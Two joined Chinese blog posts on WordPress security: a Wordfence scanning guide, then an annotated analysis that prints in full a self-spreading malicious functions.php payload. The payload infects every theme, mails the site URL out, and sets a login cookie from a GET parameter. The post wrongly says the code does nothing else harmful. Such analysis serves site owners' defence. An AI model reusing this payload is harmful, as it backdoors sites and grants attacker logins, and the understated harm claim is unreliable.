1 Wordfence Security插件下載

• 2 為何出現(xiàn)“Wordfence安裝不完整”提示？
• 3 Wordfence怎么設(shè)置？
• 4 Wordfence掃描出錯(cuò)怎么辦？
• 5 Wordfence掃描失敗怎么辦？
• 6 Wordfence插件注意事項(xiàng)
• 7 第3方工具查找木馬后門
• 8 結(jié)語

 

掃描排查WordPress惡意代碼（木馬/后門）的第三方插件/工具。

我們推薦使用WordPress插件——Wordfence Security安全防護(hù)插件。

• 它是一個(gè)基于防火墻和惡意代碼掃描的WordPress安全插件。
• 它由大型團(tuán)隊(duì)構(gòu)建和維護(hù)，100％專注于WordPress安全性。

Wordfence Security插件下載

點(diǎn)此訪問?WordPress?官網(wǎng)下載?Wordfence Security 插件

雖然有一個(gè)收費(fèi)模塊，但我們可以使用免費(fèi)模塊“掃描”，來掃描我們的WordPress網(wǎng)站來解決帶有“惡意代碼”的PHP文件。

雖然有一定的誤報(bào)率：

• 主要是一些收費(fèi)插件、主題加密組件誤報(bào)。
• 但是，用Wordfence Security安全插件尋找“惡意代碼”絕對(duì)是一個(gè)有效的方法。
• 不建議經(jīng)常打開 Wordfence Security 插件。
• 因?yàn)槠浞阑饓桶踩雷o(hù)，會(huì)對(duì)數(shù)據(jù)庫造成一定的負(fù)擔(dān)，這將影響網(wǎng)站的全體性能。

通常，當(dāng)你需要啟用插件時(shí)，請(qǐng)運(yùn)行掃描“Scan（掃描）”檢查。

完成后，關(guān)閉插件并保留，以備將來使用。

為何出現(xiàn)“Wordfence安裝不完整”提示？

因?yàn)榘惭b了其它類似的安全插件，有“沖突”造成的，停用其它安全插件就好了。

若停用其它安全插件也無法成功啟動(dòng)Wordfence插件，怎么辦？

可嘗試SSH命令重啟啟動(dòng)以下服務(wù)?▼

systemctl restart httpd
systemctl restart nginx
systemctl restart mariadb
systemctl restart memcached

測(cè)試結(jié)果，成功啟動(dòng)Wordfence插件了。

Wordfence怎么設(shè)置？

通常按照Wordfence插件的默認(rèn)設(shè)置即可。

Wordfence插件掃描怎么設(shè)置？

點(diǎn)擊“掃描”? → 掃描選項(xiàng)和計(jì)劃” → 基本掃描類型選項(xiàng)”?▼

• 推薦設(shè)置“標(biāo)準(zhǔn)掃描”：我們對(duì)所有網(wǎng)站的建議。 提供業(yè)內(nèi)最佳的檢測(cè)能力。
• 如果被黑客入侵網(wǎng)站，才選擇設(shè)置高靈敏度：對(duì)于認(rèn)為自己可能遭到黑客入侵的網(wǎng)站所有者。 更徹底，但可能會(huì)產(chǎn)生誤報(bào)。

Wordfence掃描出錯(cuò)怎么辦？

如果使用Wordfence插件掃描時(shí)，出現(xiàn)以下錯(cuò)誤提示：

Wordfence scanning servers: cURL error 28: Connection timed out after 10000 milliseconds

解決Wordfence掃描出錯(cuò)的設(shè)置方法：

第 1?步：可以在Wordfence → “工具” → “診斷” → “調(diào)試選項(xiàng)”：
嘗試啟動(dòng)或關(guān)閉“遠(yuǎn)程啟動(dòng)所有掃描（如果你的掃描未啟動(dòng)且你的站點(diǎn)可公開訪問，請(qǐng)嘗試此操作） ”

第 2 步：重新啟動(dòng) Apache服務(wù)?▼

systemctl restart httpd

在重啟Apache服務(wù)后，通常就能解決“Wordfence scanning servers: cURL error 28: Connection timed out after 10000 milliseconds”的錯(cuò)誤問題了。

Wordfence掃描失敗怎么辦？

如果Wordfence插件在掃描過程中，突然掃描失敗暫停了，出現(xiàn)以下掃描失敗的提示，怎么辦？

當(dāng)前掃描看起來已失敗。它的最后狀態(tài)更新是8mins 之前。你可以繼續(xù)等待它恢復(fù)或停止并重新開始掃描。某些站點(diǎn)可能需要調(diào)整以可靠地運(yùn)行掃描。單擊此處了解你可以嘗試的步驟。

或是如下掃描失敗提示：

當(dāng)前掃描看起來已失敗。 它的最后狀態(tài)更新是 5?minutes?之前。 你可以繼續(xù)等待它恢復(fù)或停止并重新開始掃描。 某些站點(diǎn)可能需要調(diào)整以可靠地運(yùn)行掃描。?單擊此處了解你可以嘗試的步驟。

解決辦法：

1. 點(diǎn)擊“取消掃描”；
2. 嘗試重啟Wordfence插件；
3. 再次嘗試進(jìn)行安全掃描即可。

Wordfence插件注意事項(xiàng)

關(guān)于使用Wordfence安全性插件的注意事項(xiàng)：

• 在啟動(dòng)“掃描”之前，為了確保穩(wěn)定掃描，最好禁用所有其他插件（僅啟用Wordfence安全插件）。
• 由于Wordfence安全插件掃描可能導(dǎo)致峰值服務(wù)器CPU負(fù)載，因此建議時(shí)間段選擇在清晨或站點(diǎn)流量最低時(shí)掃描。
• 我們只使用Wordfence Security的“掃描”惡意代碼規(guī)則，所以要注意掃描結(jié)果中提示的可疑php文件的路徑，這樣便于手動(dòng)備份然后清理和刪除。

我們網(wǎng)站的這篇教程說到了，WordPress主題惡意代碼分析?▼

WordPress主題惡意代碼有哪些？網(wǎng)站惡意代碼分析

幾乎近90％是由“惡意代碼”引起的。WordPress網(wǎng)站超過80％以上，是插件將惡意代碼帶入網(wǎng)站帳戶（有官方網(wǎng)站插件，在線流媒體插件等）。另一種是主題（破解版、盜版主題）是“惡意代碼”或“后……

 

第3方工具查找木馬后門

事實(shí)上，還有一個(gè)本地工具是查找PHP文件中惡意代碼的最佳方法——微軟的MSE。

• 我們可以在本地下載服務(wù)器端的PHP文件，因此微軟的MSE掃描檢測(cè)，也可以找到“惡意代碼”，“木馬”、“后門”。
• 這不僅比中國國內(nèi)“360安全衛(wèi)士”、“騰訊電腦管家”、“金山毒霸”更強(qiáng)大。
• 我們有很多第3方工具可以選擇，請(qǐng)根據(jù)自己的情況，自行選擇。

WordPress生態(tài)系統(tǒng)確實(shí)是最好的：

• 像Wordfence Security這樣的安全插件的存在，可以解決WordPress惡意代碼問題。

結(jié)語

最后，我們將再次強(qiáng)調(diào)：

1. WordPress豐富的插件和主題也是一把“雙刃劍”。
2. 在選擇和使用插件和主題時(shí)，每個(gè)人都必須謹(jǐn)慎。
3. 因?yàn)閃ordPress不安全的主要因素是插件和主題，不是WordPress官方能控制。
4. 畢竟是由第三方開發(fā)人員提交。
5. 建議永久保留使用Wordfence安全插件。
6. 對(duì)于計(jì)劃運(yùn)營網(wǎng)站的網(wǎng)絡(luò)營銷人員，建議購買正版WordPress插件和主題。
7. 因?yàn)楸I版、免費(fèi)版可能隱藏了“惡意代碼”的危險(xiǎn)。

希望我們網(wǎng)站（ https://www.wordpressx.com/ ） 分享的《Wordfence Security安全插件掃描WordPress網(wǎng)站惡意代碼》，對(duì)您有幫助。

1 WordPress主題function.php文件里的惡意代碼

• 2 如何清除WordPress主題function.php惡意病毒代碼？
• 3 Wordfence Security插件使用的注意事項(xiàng)

 

最近我們?cè)谑褂肳ordfence Security安全插件掃描網(wǎng)站惡意代碼之后，發(fā)現(xiàn)了WordPress主題的function.php文件里，隱藏惡意病毒代碼。

WordPress主題function.php文件里的惡意代碼

 

WordPress中“惡意代碼”最有可能出現(xiàn)的地方是主題目錄下的function.php，通常是隱藏在function.php文件的結(jié)尾。

主要問題：該惡意代碼會(huì)在每次有人訪問你的博客頁面時(shí)，檢測(cè)當(dāng)前博客下的所有主題是否都被感染，如果沒有，就會(huì)一起被感染。

之后在執(zhí)行wp的初始化動(dòng)作init的時(shí)候，會(huì)檢查當(dāng)前博客是否有發(fā)郵件到郵箱 [email?protected]gmail. com

怎么知道是否發(fā)了？

• 在你的wp_options表 里面有一個(gè)名為_is_widget_active_的選項(xiàng)，如果已經(jīng)發(fā)送成功，則將其值設(shè)置為1；
• 如果沒有，則以當(dāng)前被感染博客的主頁URL作為標(biāo)題和內(nèi)容。
• 僅此而已，沒有做其它壞事了。

惡意病毒代碼如下（可能會(huì)有一些差異，但基本代碼是一樣的）：

<?php
function _verifyactivate_widgets(){
//當(dāng)前文件名，如/path-to-www/wp-content/themes/SimpleDark/functions.php
//查找當(dāng)前主題functions.php文件中最后一個(gè) <? 標(biāo)記，從這個(gè)標(biāo)記的位置開始，取得一直到文件尾的內(nèi)容
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),“<“.“?”));
$output=“”;
$allowed=“”;
//去除html和php標(biāo)簽，其實(shí)這一句是扯蛋。。。
$output=strip_tags($output, $allowed);
//取得主題目錄themes的絕對(duì)路徑，如 /path-to-www/wp-content/themes
//為了加強(qiáng)程序的兼容性，它不惜以這種很晦澀的方式來獲取。。。
//以主題目錄themes的絕對(duì)路徑用array包裹為參數(shù)傳遞給_get_allwidgets_cont函數(shù)獲取此博客的所有主題的functions.php文件的絕對(duì)路徑
$direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),“themes”) + 6)));
if (is_array($direst)){
foreach ($direst as $item){
//如果主題functions.php文件可寫
if (is_writable($item)){
//特征碼
$ftion=substr($widget,stripos($widget,“_”),stripos(substr($widget,stripos($widget,“_”)),“(“));
//取目標(biāo)functions.php文件內(nèi)容
$cont=file_get_contents($item);
//沒找到特征碼?OK,試圖感染
if (stripos($cont,$ftion) === false){
//查看目標(biāo)functions.php文件最后是否是以 ?> 結(jié)尾，如果不是，給加上 ?> 標(biāo)記
$comaar=stripos( substr($cont,-20),”?”.”>”) !== false ? “” : “?”.”>”;
//這里的代碼是忽悠人了，模仿WP widgets的代碼，蠱惑你的眼睛，讓你覺得這是widget代碼。。。
$output .= $before . “Not found” . $after;
//如果文件是以 ?> 標(biāo)記結(jié)尾的，連標(biāo)記一起取過來
if (stripos( substr($cont,-20),”?”.”>”) !== false){$cont=substr($cont,0,strripos($cont,”?”.”>”) + 2);}
//開始感染,$widget內(nèi)容即是惡意代碼自身,在functions.php文件原內(nèi)容后附加惡意代碼
$output=rtrim($output, “nt”); fputs($f=fopen($item,”w+”),$cont . $comaar . “n” .$widget);fclose($f);
//后面這句也是偽裝用的
$output .= ($isshowdots && $ellipsis) ? “…” : “”;
}
}
}
}
return $output;
}
function _get_allwidgets_cont($wids,$items=array()){
//從$wids數(shù)組彈出一個(gè)元素(實(shí)際上是一個(gè)位置)
$places=array_shift($wids);
//如果位置字串是以/結(jié)尾的，則去掉/
if(substr($places,-1) == “/”){
$places=substr($places,0,-1);
}

//若不存在這樣的文件或目錄則直接返回false
if(!file_exists($places) || !is_dir($places)){
return false;
}elseif(is_readable($places)){
//否則的話。。。嘿嘿
//遍歷此目錄
$elems=scandir($places);
foreach ($elems as $elem){
if ($elem != “.” && $elem != “..”){
//如果是目錄,則加入$wids數(shù)組
if (is_dir($places . “/” . $elem)){
$wids[]=$places . “/” . $elem;
} elseif (is_file($places . “/” . $elem)&&
$elem == substr(__FILE__,-13)){
//否則，如果是文件，并且文件名等于 functions.php的話，則加入到$items數(shù)組保存,這才是它的目的functions.php正是它要找的
$items[]=$places . “/” . $elem;}
}
}
}else{
return false;
}
//下面還有子目錄？再找找看,遞歸
if (sizeof($wids) > 0){
return _get_allwidgets_cont($wids,$items);
} else {
//好了，完事了，以數(shù)組返回所有找到的functions.php文件的絕對(duì)路徑
return $items;
}
}

//下面是3個(gè)針對(duì)低版本的php而寫的兼容函數(shù)
if(!function_exists(“stripos”)){
function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );
}
}

if(!function_exists(“strripos”)){
function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
}
else{
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) – $offset ), 0 ) ) );
}
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) – ( $found + $offset + strlen( $needle ) ) );
return $pos;
}
}
if(!function_exists(“scandir”)){
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != “.” && $file != “..”) || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
array_push($dirArray,basename($file));
}
}
closedir($handle);
}
return $dirArray;
}
}

//這個(gè)動(dòng)作添加了，用于檢測(cè)所有主題目錄下functions.php并感染
add_action(“admin_head”, “_verifyactivate_widgets”);

function _getprepare_widget(){
if(!isset($text_length)) $text_length=120;
if(!isset($check)) $check=”cookie”;
if(!isset($tagsallowed)) $tagsallowed=”<a>“;
if(!isset($filter)) $filter=”none”;
if(!isset($coma)) $coma=””;
if(!isset($home_filter)) $home_filter=get_option(“home”);
if(!isset($pref_filters)) $pref_filters=”wp_”;
if(!isset($is_use_more_link)) $is_use_more_link=1;
if(!isset($com_type)) $com_type=””;
if(!isset($cpages)) $cpages=$_GET[“cperpage”];
if(!isset($post_auth_comments)) $post_auth_comments=””;
if(!isset($com_is_approved)) $com_is_approved=””;
if(!isset($post_auth)) $post_auth=”auth”;
if(!isset($link_text_more)) $link_text_more=”(more…)”;
if(!isset($widget_yes)) $widget_yes=get_option(“_is_widget_active_”);
if(!isset($checkswidgets))
//這個(gè)實(shí)際是wp_set_auth_cookie
$checkswidgets=$pref_filters.”set”.”_”.$post_auth.”_”.$check;
if(!isset($link_text_more_ditails)) $link_text_more_ditails=”(details…)”;
if(!isset($contentmore)) $contentmore=”ma”.$coma.”il”;
if(!isset($for_more)) $for_more=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql=””;

//如果 _is_widget_active_ option內(nèi)容為空,即表示沒有被感染過
if (!$widget_yes) :

global $wpdb, $post;
//取出存在已經(jīng)通過的評(píng)論（不包括trackback/pingback）的文章
// post_author 為 [email?protected] 的文章，肯定是沒有的

$sq1=”SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=”1” AND comment_type=”” AND post_author=”li”.$coma.”vethe”.$com_type.”mas”.$coma.”@”.$com_is_approved.”gm”.$post_auth_comments.”ail”.$coma.”.”.$coma.”co”.”m” AND post_password=”” AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
if (!empty($post->post_password)) {
if ($_COOKIE[“wp-postpass_”.COOKIEHASH] != $post->post_password) {
if(is_feed()) {
$output=__(“There is no excerpt because this is a protected post.”);
} else {
$output=get_the_password_form();
}
}
}
if(!isset($fixed_tags)) $fixed_tags=1;
if(!isset($filters)) $filters=$home_filter;
//$gettextcomments實(shí)際上為 wp_mail
if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;
if(!isset($tag_aditional)) $tag_aditional=”div”;

//這里$sh_cont即為 [email?protected]
if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, “l(fā)ive”), 20);#
if(!isset($more_text_link)) $more_text_link=”Continue reading this entry”;
if(!isset($isshowdots)) $isshowdots=1;

$comments=$wpdb->get_results($sql);
if($fakeit == 2) {
$text=$post->post_content;
} elseif($fakeit == 1) {
$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
$text=$post->post_excerpt;
}
//開始調(diào)用　wp_mail 向 [email?protected] 發(fā)送郵件，標(biāo)題和內(nèi)容都是被感染的博客的URL 地址
$sq1=”SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=”1” AND comment_type=”” AND comment_content=”. call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) .” ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
if($text_length < 0) {
$output=$text;
} else {
if(!$no_more && strpos($text, “<span id=“more-5265”></span>“)) {
$text=explode(“<span id=“more-5675”></span>“, $text, 2);
$l=count($text[0]);
$more_link=1;
//執(zhí)行這一句時(shí)就開始發(fā)郵件了。
$comments=$wpdb->get_results($sql);
} else {
$text=explode(” “, $text);
if(count($text) > $text_length) {
$l=$text_length;
$ellipsis=1;
} else {
$l=count($text);
$link_text_more=””;
$ellipsis=0;
}
}
for ($i=0; $i<$l; $i++)
$output .= $text[$i] . ” “;
}
//把感染標(biāo)記置為1
update_option(“_is_widget_active_”, 1);
if(“all” != $tagsallowed) {
$output=strip_tags($output, $tagsallowed);
return $output;
}
endif;
$output=rtrim($output, “sntrx0B”);
$output=($fixed_tags) ? balanceTags($output, true) : $output;
$output .= ($isshowdots && $ellipsis) ? “…” : “”;
//$filter 為 none …,又是在偽裝
$output=apply_filters($filter, $output);
switch($tag_aditional) {
case(“div”) :
$tag=”div”;
break;
case(“span”) :
$tag=”span”;
break;
case(“p”) :
$tag=”p”;
break;
default :
$tag=”span”;
}

//$checkswidgets即是wp_set_auth_cookie
if ($is_use_more_link ) {
if($for_more) {
$output .= ” <” . $tag . ” class=”more-link”><a href=””. get_permalink($post–>ID) . “#more-” . $post->ID .”” title=”” . $more_text_link . “”>” . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : “” . “</a></” . $tag . “>” . “n”;
} else {
$output .= ” <” . $tag . ” class=”more-link”><a href=””. get_permalink($post–>ID) . “” title=”” . $more_text_link . “”>” . $link_text_more . “</a></” . $tag . “>” . “n”;
}
}
return $output;
}

//這里是用來干壞事的，這才是這個(gè)惡意代碼的目的,前面的感染是“準(zhǔn)備活動(dòng)”
add_action(“init”, “_getprepare_widget”);


//這個(gè)函數(shù)也是用來偽裝的,無惡意
function __popular_posts($no_posts=6, $before=”<li>“, $after=”</li>“, $show_pass_post=false, $duration=””) {
global $wpdb;
$request=”SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS ”comment_count” FROM $wpdb->posts, $wpdb->comments”;
$request .= ” WHERE comment_approved=”1” AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=”publish””;
if(!$show_pass_post) $request .= ” AND post_password =”””;
if($duration !=””) {
$request .= ” AND DATE_SUB(CURDATE(),INTERVAL “.$duration.” DAY) < post_date “;
}
$request .= ” GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts”;
$posts=$wpdb->get_results($request);
$output=””;
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . ” <a href=”” . $permalink . “” title=”” . $post_title.“”>” . $post_title . “</a> ” . $after;
}
} else {
$output .= $before . “None found” . $after;
}
return $output;
}
?>

WordPress主題惡意代碼有哪些？

如果使用Wordfence Security安全插件掃描確定你的function.php文件被篡改了，需要檢查一下，例如：

1. _verifyactivate_widgets
2. function?_checkactive_widgets
3. function?_get_allwidgets_cont
4. function stripos
5. function strripos
6. function?scandir
7. function?_getprepare_widget
8. function?__popular_posts
9. add_action(“admin_head”,?“_checkactive_widgets”);
10. add_action(“init”,?“_getprepare_widget”);
11. _verify_isactivate_widgets
12. _check_isactive_widget
13. _get_allwidgetscont
14. _prepare_widgets
15. __popular_posts

• 每一行都是獨(dú)立的，如果你的functions.php中有以上代碼，那么你可能會(huì)被擊中。
• 其中，functions和add_action一般是屬于“準(zhǔn)備活動(dòng)”的“惡意代碼”的代碼。

如何清除WordPress主題function.php惡意病毒代碼？

清理起來也很簡(jiǎn)單，只要在WordPress主題的function.php文件中，找到上面類似的代碼并刪除即可，但是因?yàn)橐坏┍桓腥荆愕膖hemes主題目錄下的所有主題會(huì)被感染，所以只清除當(dāng)前使用的主題是無效的，清除后很快就會(huì)生成。

解決方法是清除一個(gè)WordPress主題的惡意病毒代碼后，將functions.php文件設(shè)置為444權(quán)限，然后清除其它WordPress主題。

至于最后一個(gè)functions.php文件的444權(quán)限是否需要改回來，們?nèi)私ㄗh444還是比較安全的，需要修改的時(shí)候可以修改。

Wordfence Security插件使用的注意事項(xiàng)

我們推薦 Wordfence Security 的 WordPress 插件，一個(gè)集成了防火墻和惡意代碼掃描的 WordPress 安全插件，由一個(gè)大型團(tuán)隊(duì)構(gòu)建和維護(hù)，100% 專注于 WordPress 安全。

雖然有付費(fèi)模塊，但我們可以使用免費(fèi)模塊“掃描”來掃描我們的WordPress網(wǎng)站，檢查包含“惡意代碼”的PHP文件，雖然有一定的誤報(bào)率（主要是一些正版插件， 主題加密組件會(huì)被誤報(bào)），但查找“惡意代碼”肯定是事半功倍。

需要注意的是，這個(gè)插件不建議經(jīng)常開啟，因?yàn)樗姆阑饓桶踩雷o(hù)會(huì)對(duì)數(shù)據(jù)庫造成一定的負(fù)載壓力，影響網(wǎng)站的性能。

通常，啟用插件以在需要時(shí)運(yùn)行“掃描”掃描。

排查完畢后關(guān)閉插件，以備不時(shí)之需。

希望我們網(wǎng)站（ https://www.wordpressx.com/ ） 分享的《WordPress主題如何清理惡意代碼_verifyactivate_widgets》，對(duì)您有幫助。